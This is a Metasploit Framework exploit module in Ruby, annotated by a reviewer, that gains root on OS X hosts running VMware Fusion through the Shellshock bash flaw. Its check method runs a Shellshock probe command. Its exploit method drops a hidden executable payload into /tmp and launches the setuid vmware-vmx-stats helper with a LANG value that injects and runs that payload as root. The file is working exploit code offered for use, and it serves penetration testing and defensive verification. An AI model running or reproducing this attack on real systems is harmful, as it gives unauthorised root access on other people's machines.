Path: blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege-escalation module for OS X hosts running VMware Fusion.
#
# It depends on CVE-2014-6271 (Shellshock): a bash that imports function
# definitions from environment variables also runs whatever follows the
# definition. `check` reports the host as safe when bash does not show that
# behaviour, so a bash build patched for CVE-2014-6271 is the remediation to
# verify on affected hosts.
class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::OSX::Priv
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Registers the module metadata and its two options.
  #
  # @param info [Hash] metadata passed in by the framework and merged through
  #   update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)',
        'Description' => %q{
          This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
          handles external environment variables. This module targets the VMWare Fusion
          application, allowing an unprivileged local user to get root access.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Stephane Chazelas', # discovered the bash bug
          'juken', # discovered the VMWare priv esc
          'joev', # msf module
          'mubix' # vmware-vmx-stats
        ],
        'References' => [
          [ 'CVE', '2014-6271' ],
          [ 'CWE', '94' ],
          [ 'OSVDB', '112004' ],
          [ 'EDB', '34765' ]
        ],
        'Platform' => 'osx',
        'Arch' => [ ARCH_X64 ],
        'SessionTypes' => [ 'shell', 'meterpreter' ],
        'Targets' => [
          [
            'Mac OS X 10.9 Mavericks x64 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X64
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2014-09-24',
        # NOTE(review): stability, reliability and side effects are left
        # undeclared here. The code below does write an executable file into
        # WritableDir (registered for cleanup), which is an on-disk artifact.
        'Notes' => {
          'AKA' => ['Shellshock'],
          'Stability' => UNKNOWN_STABILITY,
          'Reliability' => UNKNOWN_RELIABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('VMWARE_PATH', [true, "The path to VMware.app", '/Applications/VMware Fusion.app'])
      ]
    )
    register_advanced_options(
      [
        OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
      ]
    )
  end

  # @return [String] the WritableDir option, coerced to a string
  def base_dir
    datastore['WritableDir'].to_s
  end

  # Writes data to path on the session host and registers the file for
  # cleanup (both helpers presumably come from the included mixins).
  #
  # @param path [String] destination path on the session host
  # @param data [String] file contents
  def upload(path, data)
    print_status("Writing '#{path}' (#{data.size} bytes) ...")
    write_file(path, data)
    register_file_for_cleanup(path)
  end

  # Reports whether the session host shows the two preconditions this module
  # needs.
  #
  # 1. bash runs a command appended to a function definition held in an
  #    environment variable (a random marker is echoed back).
  # 2. `file` on VMWARE_PATH does not answer "cannot open".
  #
  # NOTE(review): nothing here inspects the vmware-vmx-stats helper itself
  # (presence, setuid bit, or whether it reaches bash), so Vulnerable is a
  # necessary signal rather than a sufficient one.
  #
  # @return [CheckCode] CheckCode::Vulnerable or CheckCode::Safe
  def check
    marker = Rex::Text.rand_text_alphanumeric(5)

    # Precondition 1: the bash env variable bug. The second command is only
    # run when this one succeeds.
    bash_output = cmd_exec("env x='() { :;}; echo #{marker}' bash -c echo")
    return CheckCode::Safe unless bash_output.include?(marker)

    # Precondition 2: the configured application path can be opened.
    file_output = cmd_exec("file '#{datastore['VMWARE_PATH']}'")
    return CheckCode::Safe if file_output =~ /cannot open/

    CheckCode::Vulnerable
  end

  # Module entry point. Stops early when the session is already root, when
  # `check` does not return Vulnerable, or when WritableDir is not writable.
  # Otherwise it writes the payload executable into WritableDir and launches
  # the VMware helper with LANG carrying a function definition followed by the
  # payload path.
  def exploit
    fail_with(Failure::BadConfig, 'Session already has root privileges') if is_root?
    fail_with(Failure::NotVulnerable, 'Target is not vulnerable') unless check == CheckCode::Vulnerable
    fail_with(Failure::BadConfig, "#{base_dir} is not writable") unless writable?(base_dir)

    # Hidden (dot-prefixed), randomly named file inside WritableDir.
    dropped_path = "#{base_dir}/.#{Rex::Text.rand_text_alpha_lower(8..12)}"
    macho = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
    upload(dropped_path, macho)
    cmd_exec("chmod +x #{dropped_path}")

    print_status('Running VMWare services...')
    helper_rel_path = '/Contents/Library/vmware-vmx-stats' # path to the suid binary
    # The LANG value has the same `() {` prefix as the probe in `check`; a bash
    # that no longer imports functions from the environment ignores it.
    cmd_exec("LANG='() { :;}; #{dropped_path}' '#{datastore['VMWARE_PATH']}#{helper_rel_path}' /dev/random")
  end
end